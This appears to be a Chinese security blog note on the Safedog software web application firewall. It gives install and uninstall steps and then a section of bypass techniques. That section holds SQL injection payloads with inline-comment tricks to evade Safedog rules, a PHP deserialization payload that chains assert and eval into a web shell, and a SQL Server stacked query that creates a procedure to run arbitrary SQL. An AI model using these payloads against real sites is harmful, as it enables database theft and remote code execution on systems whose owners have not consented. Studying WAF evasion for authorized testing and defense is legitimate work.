应用安全-安全设备-Waf系列-软Waf-安全狗(Safedog)
2024-10-07 10:08:17
安装 - Linux
下载
http://download.safedog.cn/safedog_linux64.tar.gz
wget http://download.safedog.cn/safedog_linux64.tar.gz 解压
tar xvf safedog_linux64.tar 运行
./install.py 卸载
进入安装包解压目录
chmod +x uninstall.sh
./uninstall.sh
安装 - Windows
下载
http://down.safedog.cn/download/software/safedogfwqV5.0.exe
使用指南
https://www.safedog.cn/download/software/safedogfwq_Windows_Help.pdf https://www.safedog.cn/download/software/safedogfwq_linux_Help.pdf
绕过
规则缺陷绕过 - 搜索框 + 字符型SQL注入 + IIS + ASPX + /**a*/
aspx?Pro=广x' and 1=1 -- #检测
aspx?Pro=广x' /**a*/and 1=1 -- #绕过
#遍历
aspx?Pro=广x' /**a*/union /**a*/select 1,2,3,4,5 --
aspx?Pro=广x' /**a*/and 1=(select 1) --
PHP反序列化绕过
<?php
class A{
public $name;
public $male;
function __destruct(){
$a = $this->name;
$a($this->male);
}
}
unserialize($_POST['un']);
?> POST - un=O::"A"::{s::"name";s::"assert";s::"male";s::"eval($_GET["x"])";} GET - x=phpinfo(); --结合Hackbar使用
存储过程 + SQLServer 绕过
?type=;EXEC/*(*/student..sp_sqlexec 'CREATE PROCEDURE myexec(@s VARCHAR(1024)) as exec(@s)'
最新文章
- JavaScript- jquery easyui 可编辑表格插件 easyui.editgrid
- AVL的删除写法的一个错误
- [Offer收割]编程练习赛3 - 题目3 : 智力竞赛
- 如何分析解读systemstat dump产生的trc文件
- 添加Distributor失败
- jQuery 焦点图 旋转木马
- HDU 4744 Starloop System(ZKW费用流)
- Cassandra1.2文档学习(15)—— 配置数据一致性
- about家庭智能设备部分硬件模块功能共享【协同工作】solution
- Node.js学习(10)----文件系统fs
- ida idc函数列表全集
- HTTP初步注解
- 前序 中序 后序 遍历 递归 非递归算法 java实现
- Codeforces 514 D R2D2 and Droid Army(RMQ+二分法)
- 使用原始XML资源——定义原始XML资源
- Theano环境搭建/安装
- python 批量删除mysql前缀相同的表
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versio
- mybatis中String参数的传递
- MySQL之SQL注入